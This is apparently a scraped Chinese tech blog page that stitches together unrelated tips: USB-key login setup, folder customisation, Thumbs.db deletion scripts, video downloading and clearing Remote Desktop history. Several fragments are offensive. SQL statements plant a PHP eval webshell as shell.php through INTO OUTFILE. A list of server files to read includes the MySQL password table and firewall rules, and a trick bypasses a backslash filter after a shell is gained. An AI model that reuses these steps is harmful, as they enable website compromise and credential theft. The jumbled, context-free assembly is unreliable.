Chinadu's Blog

如果想在系统启动后弹出Slax的CD盘片（例如想观看DVD或者光盘MP4影片），则需要在引导时的提示符输入“slax copy2ram”并回车

U盘 如今可以说非常普及了，不过，如果只是把它用来存储数据的话，也许有点可惜了。其实，我们还可以让U盘发挥更大的能量！今天小编教你一招，能让你的U盘代 替登录系统的密码，只有当你插上U盘才能正常进入系统操作，否则任何操作都无法进入系统。怎么样，是不是很有兴趣一试？
要想成功实现上述功能，我们需要借助名为Disklogon的小工具，它是一个功能强大的安全设置工具，可让我们使用优盘、软盘等移动设备来登录系统，可在登录时免于输入用户名和登录密码；而一旦移走了这些设备，系统便可以设置为自动锁定或关机。下面就来看看如何设置让优盘变成控制登录系统的“密钥盘”。
点击进入Disklogon下载页面

完成软件安装之后按要求重新启动，之后在进入系统的画面中单击“Password”按钮，然后使用键盘输入密码登录（如果之前设置了使用密码登录的话）。但我们是不希望每次都这样繁琐的，下面就来设置一下让优盘发挥更强大的功能，让它直接来控制系统登录。

直接开始菜单中单击“Disklogon Options”进入设置界面，随后依次执行如下步骤设定:

Step1：依次执行“Options/Disklogon/Disks”操作，窗口右侧中默认将所有的盘符都勾选了，但我们只希望用优盘来作为密钥盘，所以只勾选优盘的盘符（例如笔者的为L:）。

Step2：单击窗口左侧的“Options/DiskLogon/General”分支，接下来，我们要在右侧设置有优盘和无优盘时的不同操作：

1.在“Disk removal behavior”下拉列表框中选择“Lock computer when the disk is removed”（当磁盘被取出后将电脑锁定），这样当优盘被拔除后系统就自动锁定了；如果想在拔除优盘后自动注销，则可选择“Log off when the disk is removed”。

2.在“Log on to Windows”下拉列表框中选择“Log on when disk is connected”（当链接有优盘时自动登录系统），这样，如果在开机后没有连接优盘，则不能进入系统。

3.在“Unlock computer”下拉列表框中选择“Unlock computer when the disk is connected”（当连上优盘时自动解除对系统的锁定）。

小贴士：默认情况下，系统登录时，如果没有没有连接优盘，用户可点击 “Cancel”然后手工输入用户名和密码来进入系统。但为了增强安全性，去掉“Allow users to type their usename and password to log on or unlock computer”（允许用户输入用户名和密码来登录或解锁系统）选项！如此一来没有优盘插入就无法登陆系统了。

控制系统登录之 创建登录信息

Step3：完成上述设置后，我们就可以进行最后一步设置了，即登录系统解锁时所用的用户名和密码。点击进入“User Accounts”标签，随后点击“Change Logon information”区域处的“Change”按钮，进入用户名、密码创建界面（图2）。具体步骤：在“Step1”区域选择当前系统中正在使用的U 盘，接着点击“Step2”区域选择某ID号（如01），此时“Create New”将呈现可用状态，点击该按钮，并在随后的弹出窗口中输入用户名及密码即可。

如果希望用加密算法对登录信息进行加密，可勾选对话框中的“Encrypt this logon information with strong encryption algorithm”选项。添加完成后单击“close”按钮返回主窗口。

小贴士：设置了登录用户名和密码后，优盘根目录下会生成一个名为logon.dln的文件，这个文件不能删除！否则，下次重新启动时即使你插上了优盘，也会因为系统不能读取“指纹”而导致进不了系统！

至此，所有相关设置已经完成，现在你的U盘就已经是密钥盘了。在没有连接优盘的情况下根本是无法进入系统的；而在系统使用中途，如果将优盘拔除，系统便会自动锁定—单击对话框中的“Unlock”也是无效的，除非再次将优盘连接到电脑中。目前软件只支持Windows 2000/XP/2003系统。

进去后:

Create TABLE b (cmd text NOT NULL);


Insert INTO b (cmd) VALUES('<?php @eval($_POST[cmd]);?>'); 


//在字段cmd中插入一句话木马，木马内容为

<?php @eval($_POST[cmd]);?> 


前3句都尅执行成功最后一句执行后显示空白

select cmd from b into outfile 'E:\wwwroot\phpcms\phpcms\shell.php';


[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=F:\lzmyst\123.jpg

#PS1：目标文件夹需系统属性才显示，可attrib +s处理

#PS2：共享下也可看到背景

[.ShellClassInfo]
IconFile=%SystemRoot%\system32\shell32.dll
#图标文件
IconIndex=-173
#图标文件里的第几个图标
LocalizedResourceName=@shell32.dll,-12693
#显示的名字，比如文件夹名明明是“Favorites”，但在你没进入文件夹前看到的名字却是“收藏夹”

PS:给喜欢花哨的人分享一下吧，我不喜欢把我的文件夹搞的花花绿绿的

很多亲因为YUPOO水印而烦恼~
现在有去除方法了~

列如我们得到的代码是:http://pic.yupoo.com/momodis/765475d05e6/medium.jpg
只要把"pic"换成"photo"

把".jpg"换成" .jpg/ "就OK了
所以最后变成:http://photo.yupoo.com/momodis/765475d05e6/medium.jpg/
后面的就和平常的帖图一样了。
这样就能完美的去除yupoo的广告水印了

最近挺多朋友问我的一个问题是给我一段网址（一般是youtube）叫我找下载地址给他们，一般这样的我会介绍他们到一个网站（http://keepvid.com/）然后里面有自动分析，下载后只要改下后缀名为flv就好了。当然这个网站还可以分析国外很多视频站的链接，比如google video等，不过这个毕竟是国外站的，只能分析些国外的链接。有些人还喜欢去下土豆，mofile，56之类的视频站资源，那么今天给大家推荐一个国内的软件。

维棠FLV视频下载软件
维棠FLV视频下载软件经过一段时间的开发和完善,具有软件小、使用方便、FLV视频真实地址分析速度快,准确等特点。

功能特性:
1、准确分析FLV视频节目真实地址;
2、支持最多最火热播客视频分享站内容下载;
3、自带维棠FLV视频播放器;
4、支持播客网站播放列表批量下载;
5、支持断点续传;
6、提供简体中文、繁体中文及英文三种语言版本选择;
7、支持注释名命名方式;
8、自带视频格式转换插件,可将FLV格式视频节目转换成WMA格式;
9、提供安装版,绿色版,带转换插件版等多种版本下载
10、增加下载限速功能;
11、提供最火热视频推荐。

更新日志:
1、增加了下载限速功能
2、目录树里增加一项“使用帮助”
3、转换视频的时候,可以选择只要视频或者只要音频
4、转换结束之后,增加一个提示音
5、右边增加一个推荐窗口
6、修正了根据注释命名时使用非法字符的错误
7、增加了更多的支持网站

软件下载

办法之一：

禁止产生Thumbs.db文件的方法：

在“控制面板”中双击“文件夹选项”，在“文件夹选项”对话框中切换到“查看”标签，在在高级设置中将“不缓存缩略图”复选框前打上“√”，再点击“确定”按钮退出。

隐藏Thumbs.db文件的方法：

如果将“隐藏受保护的操作系统文件（推荐）”和“不显示隐藏的文件和文件夹”选择上，那么Thumbs.db文件你也就看不到了，但这只是隐藏了它而已，实质它还是存在的。

全盘删除Thumbs.db文件的方法：

将以下保存成bat批处理文件，然后执行即可。

@echo off

del c:＼Thumbs.db /f/s/q/a

del d:＼Thumbs.db /f/s/q/a

del e:＼Thumbs.db /f/s/q/a

del f:＼Thumbs.db /f/s/q/a

del g:＼Thumbs.db /f/s/q/a

del h:＼Thumbs.db /f/s/q/a

del i:＼Thumbs.db /f/s/q/a

del j:＼Thumbs.db /f/s/q/a

exit

另人头疼烦恼的Thumbs.db全部消失了，世界清净了。

办法之二：

     Thumbs.db这个文件通常情况下是隐藏的，所以要显示隐藏文件才看得到。通常会在一个图片的文件夹里发现，他是用来缓存缩略图的数据的。但是有时因为这个文件夹的图片增减、变化的问题，他会越来越大。其实这个都不是主要原因，我之所以要删除全盘的Thumbs.db，是因为并不是每个图片的文件夹，我都想让他缩略图显示，但是改回不是缩略图显示，Thumbs.db并没有自动消失掉，而且网上所谓的不缓存缩略图，貌似也没有作用。

复制两条"-------------------------"之间的代码到记事本，不包括“------------”，改后缀名为cmd双击运行。

---------------------------------------------------------------

FOR %%a IN ( C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z: ) DO   DEL /f/s/q/a %%a\Thumbs.db

----------------------------------------------------------------

<html>
　　<head>
　　<script language="javascript">
　　function clear(){
　　Source=document.body.firstChild.data;
　　document.open();
　　document.close();
　　document.title="看不到源代码";
　　document.body.innerHTML=Source;
　　}
　　</script>
　　</head>
　　<body onload=clear()>
　　<!--
　　<a href="www.4shell.org">Chinadu`s blog</a>可惜你看不到！
　　-->
　　</body>
　　</html>
　　这招算是目前网上公布的防止查看源代码的方法中最好的了，当然了，要看还是办法的，比如在地址栏中输入
　　javascript:alert(document.documentElement.outerHTML);

常用远程桌面连接的朋友都会发现，远程桌面连接每次都会记录成功连接的远程IP或者域名，并将这些信息显示在连接地址输入框的下拉菜单里。这样一来当然为远程桌面连接的使用提供了方便，但是在无形之中也增加了安全隐患。

下面教你怎么删除这些记录。
首先运行regedit，打开注册表，找到
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
右边的那些键值就记录了IP或者域名。
另外最后一次连接的IP或者域名还是会显示在远程桌面连接的连接目标输入框上面，这个信息储存在“我的文档”下的“Default.rdp”文件中，删之即可。
另外，可以把
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
这个键值的权限设置为不可改写。
同样Default.rdp也是，这样一来远程桌面连接就不会记录你的登陆信息了。

文章作者：pt007[at]vip.sina.com版权所有,转载请注明版权
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
原始链接：http://forum.eviloctal.com/viewthread.php?tid=30399

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
C:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
/etc/sysconfig/iptables //从中得到防火墙规则策略

不是所有的linux都有/etc/redhat-release文件的。这个只能说明是redhat，读系统版本还是读取/etc/issue 或者 /etc/issue.net

作者：allyesno

当你拿到shell以后 发现对方的 不知道是防火墙 还是 ids 还是 hips 或者某某山寨产品 竟然把

\ 给过滤了 ，无法路径跳转 很不方便的说

下面提供邪恶的一小段代码 以备急时所需

%tmp:~2,1%